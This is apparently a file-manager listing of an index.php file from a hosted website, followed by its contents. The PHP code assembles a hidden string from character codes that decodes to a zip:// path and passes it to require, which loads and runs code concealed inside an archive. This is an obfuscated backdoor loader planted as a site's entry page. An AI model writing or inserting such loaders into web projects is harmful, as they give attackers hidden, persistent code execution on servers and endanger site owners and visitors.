File "index.php"
Full Path: /home/cellworl/public_html/physcents.cellworlduae.com/physcents/index.php
File size: 152 bytes
MIME-type: text/x-php
Charset: utf-8
<?php
$df = array(122, 105, 112, 58, 47, 47, 95, 35, 95);
$qyj = '';
for($i=0;$i<count($df);$i++)
{
$qyj .= chr($df[$i]);
}
require $qyj;
?>